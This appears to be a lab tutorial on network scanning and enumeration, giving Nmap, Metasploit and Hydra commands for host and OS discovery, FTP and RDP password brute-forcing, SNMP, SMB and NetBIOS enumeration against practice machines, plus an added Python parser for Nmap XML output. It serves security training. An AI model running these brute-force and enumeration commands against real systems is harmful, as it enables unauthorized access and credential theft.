Network Scanning 101
Discover Host, OS and other Information through Nmap and Metasploit

Host Discovery:
Command [Nmap]
Best for Host Discovery [ #nmap -A 192.168.0.1/24 ]
OS Discovery:
Best for OS Discovery [ #nmap -O 192.168.0.118 ]
OS Discovery Using Nmap Scripting Engine
#nmap --script=smb-os-discovery.nse 192.168.0.118
Scan beyond IDS, Firewall using various Techniques:
Best Command to scan
#nmap -sC -sV -p- -O -A -T4 192.168.0.1/24
Scan Target network using Metasploit
Let's say our Target Machine is Metasploitable 2 and we'll scan the Target Machine's Network through the Metasploit Framework.
So here are the Steps —
Step 01 — Start the Metasploitable 2 Machine
Step 02 — Start the PostgreSQL Service / Initialize msfdb
Step 03 — Run the Metasploit Framework

Step 04 — Check the Database Status

Step 05 — Run the Nmap Command (-oX writes the results as XML to a file named Test)
#nmap -Pn -sS -A -oX Test 192.168.0.105/24

Step 06 — Import the Test file into the Database

Step 07 — Check out the Hosts

Step 08 — Check out the running Services

Step 09 — Search for a Port Scan module

Step 10 — Set the Target

Step 11 — Run
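As an added example that is not part of the original post, here is a small Python parser for the XML file that the -oX Test option above writes, the same data the import step loads into the Metasploit database; it lists each live host's open ports and flags the services the rest of this post enumerates (FTP, SNMP, SMB, RDP) so a defender can justify or close each exposure. The sample XML is constructed, and the WATCH table and function names are my own.

```python
# Added example, not from the original post: parse the XML written by
# "nmap -oX Test ..." (step 05), the same file db_import loads in step 06.
import xml.etree.ElementTree as ET

# Constructed sample of Nmap XML output, trimmed to the elements used here.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.168.0.105" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
      <port protocol="udp" portid="161"><state state="open"/><service name="snmp"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="192.168.0.106" addrtype="ipv4"/></host>
</nmaprun>
"""

def parse_open_ports(xml_text):
    """Return {ip: [(port, proto, service), ...]} for hosts that are up,
    keeping only ports Nmap reported as open."""
    result = {}
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue  # down hosts and hosts without an IPv4 address are skipped
        ports = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            ports.append((int(port.get("portid")), port.get("protocol"), name))
        result[addr.get("addr")] = sorted(ports)
    return result

# Ports the post goes on to enumerate (FTP, SNMP, SMB, RDP); a defender reviewing
# the scan wants these flagged so each exposure can be justified or closed.
WATCH = {(21, "tcp"): "ftp", (161, "udp"): "snmp", (445, "tcp"): "smb", (3389, "tcp"): "rdp"}

def exposed_services(xml_text):
    """Return sorted (ip, port, label) tuples for watched ports that are open."""
    return sorted((ip, p, WATCH[(p, proto)])
                  for ip, ports in parse_open_ports(xml_text).items()
                  for p, proto, _ in ports if (p, proto) in WATCH)
```

Run it against a real Test file with `parse_open_ports(open("Test").read())`; closed ports (3389 in the sample) and down hosts are dropped.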
Log in and Connect to the target FTP Service
Run the Commands step by step
#nmap -p 21 192.168.0.104
As we don't have any credentials to log in to the FTP server, we have to brute-force it.
#hydra -L [userlist] -P [passwordlist] 192.168.0.104 ftp
Copy the credentials we get, save them in a file, and then try to log in. Run the command
#ftp 192.168.0.104
> ls
To download the target file, use the get command
>get secret.txt
>exit
Come back to the local machine and run these commands
#ls
#cat secret.txt
And here is the answer.
Find the default ports used by SNMP. List the valid community strings of the server by using the snmp_login Metasploit module.
Run these commands step by step.
And here is the NSE script reference — https://nmap.org/nsedoc/scripts/
#snmp-check 192.168.0.108
To run the snmp_login module, do it this way
#msfconsole
>search snmp
>use auxiliary/scanner/snmp/snmp_login
>show options
>ip a
>set RHOSTS 192.168.0.104
>show options
>exploit
SMB Enumeration !!
What to hack?
-Network File Shares
-Logged in User details
-Workgroups
-Security Level Information
-Domains and Services
Run these commands
#nmap 10.4.29.134
We know the SMB service is running on port 445
Now, Enumerating -Network File Shares
#nmap -p 445 --script smb-enum-shares 10.4.29.134
Now, Enumerating -Logged in User details
#nmap -p 445 --script smb-enum-users --script-args smbusername=administrator,smbpassword=smbserver_771 10.4.29.134
Now, Enumerating -Workgroups
#nmap -p 445 --script smb-enum-groups --script-args smbusername=administrator,smbpassword=smbserver_771 10.4.29.134
Now, Enumerating -Security Level Information
#nmap -sC -sV -A -T4 -p445 10.4.29.134
Now, Enumerating -Domains and Services
#nmap -p 445 --script smb-enum-services --script-args smbusername=administrator,smbpassword=smbserver_771 10.4.29.134
Exploiting RDP Services !!
We know the RDP port is 3389 or 3333
Steps —
- Check for running services on the target and confirm if RDP is running on any open port
- Use Metasploit to confirm the services running is RDP
- Use Hydra to bruteforce the login credentials
- Use the RDP tools to log into the victim’s machine.
Now let's start and run the commands —
Step 01 —
#nmap 10.5.17.119
Step 02 —
#msfconsole -q
>search rdp
>use auxiliary/scanner/rdp/rdp_scanner [ 35 option]
>show options
> set RHOSTS 10.5.17.119
>set RPORT 3333 [or 3389, whichever you've found]
>exploit
>exit
Step 03 — Bruteforce login Credentials
#hydra -L [userlist] -P [passwordlist] rdp://10.5.17.119 -s 3333
Step 04 — Use the RDP tools to log into the victim’s machine.
Copy the credentials we get, save them in a file, and then try to log in. Run the command
#xfreerdp /u:[username] /p:[password] /v:[target user's ip]:3333 [port]
>Y (accept the server certificate prompt)
That’s all !
NetBIOS Enumeration !!
We know the NetBIOS ports are 137/TCP or 137/UDP, 138/UDP, and 139/TCP
So run the command
#nmap -sV --script nbstat.nse 192.168.0.105
Here you’ll get the answer.